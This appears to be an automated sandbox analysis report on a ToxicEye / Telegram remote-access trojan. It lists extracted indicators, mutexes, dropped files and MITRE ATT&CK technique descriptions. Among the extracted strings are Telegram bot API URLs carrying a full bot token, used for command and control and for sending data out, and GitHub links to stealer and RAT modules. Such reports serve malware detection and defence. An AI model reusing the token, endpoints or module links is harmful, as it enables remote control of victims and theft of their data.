Source: rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DCEE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/getFile?file_id=
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/getUpdates
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/send
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendLocation?chat_id=6193
Source: rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=
Source: rat.exe, 0000000A.00000002.2170409712.0000023F1DCD0000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DCE4000.00000004.00000800.00020000.00000000.sdmp, rat.exe, 0000000A.00000002.2170409712.0000023F1DC48000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/sendMessage?chat_id=61934
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://api.telegram.org/file/bot6047114553:AAGZa8paKPgCHpHO-afoS_3f5nKTHsmAnIo/
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/Sodium.dl
Source: rat.exe.0.dr	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/Adamantium-Thief/master/Stealer/Stealer/modules/libs/libs
Source: dAIJ6g47mZ.exe, 00000000.00000002.2072581575.000001F37FD4E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/Te
Source: rat.exe.0.dr	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/ToxicEye/master/TelegramRAT/TelegramRAT/core/libs/AudioSw
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/hackpy/master/modules/audio.zip
Source: dAIJ6g47mZ.exe, rat.exe.0.dr	String found in binary or memory: https://raw.githubusercontent.com/tedburke/CommandCam/master/CommandCam.exe

Source: dAIJ6g47mZ.exe, utils.cs	.Net Code: KeyboardLayout
Source: rat.exe.0.dr, utils.cs	.Net Code: KeyboardLayout

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Process information set: 00 00 00 00			Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Process information set: 01 00 00 00			Jump to behavior

Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Code function: 0_2_00007FFD348A6C06	0_2_00007FFD348A6C06
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Code function: 0_2_00007FFD348A79B2	0_2_00007FFD348A79B2
Source: C:\Users\ToxicEye\rat.exe	Code function: 10_2_00007FFD348879B2	10_2_00007FFD348879B2
Source: C:\Users\ToxicEye\rat.exe	Code function: 10_2_00007FFD34886C06	10_2_00007FFD34886C06

Source: dAIJ6g47mZ.exe, 00000000.00000000.2038996212.000001F365BF2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameTelegramRAT.exe8 vs dAIJ6g47mZ.exe
Source: dAIJ6g47mZ.exe	Binary or memory string: OriginalFilenameTelegramRAT.exe8 vs dAIJ6g47mZ.exe

Source: dAIJ6g47mZ.exe, utils.cs	Cryptographic APIs: 'CreateDecryptor'
Source: rat.exe.0.dr, utils.cs	Cryptographic APIs: 'CreateDecryptor'

Source: rat.exe.0.dr, utils.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: rat.exe.0.dr, utils.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: dAIJ6g47mZ.exe, utils.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: dAIJ6g47mZ.exe, utils.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
Source: C:\Users\ToxicEye\rat.exe	Mutant created: \Sessions\1\BaseNamedObjects\ADMIN:91f124ef01f5ceb937505ec41d979375
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3476:120:WilError_03
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5928
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1292:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6488:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5208:120:WilError_03

Source: dAIJ6g47mZ.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\dAIJ6g47mZ.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\ToxicEye\rat.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll	Jump to behavior

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report dAIJ6g47mZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: ToxicEye

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Operating System Destruction

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rat.exe_53adaffc35a7cdb46b6e8a658446411b4952e3_76110556_827965d9-647e-4f95-ae50-38f14b6eb5a7\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER284.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER573.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5A3.tmp.xml

C:\Users\ToxicEye\rat.exe

C:\Users\ToxicEye\rat.exe:Zone.Identifier

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dAIJ6g47mZ.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rat.exe.log

C:\Users\user\AppData\Local\Temp\tmpE0C3.tmp.bat

C:\Windows\appcompat\Programs\Amcache.hve

Windows Analysis Report
dAIJ6g47mZ.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre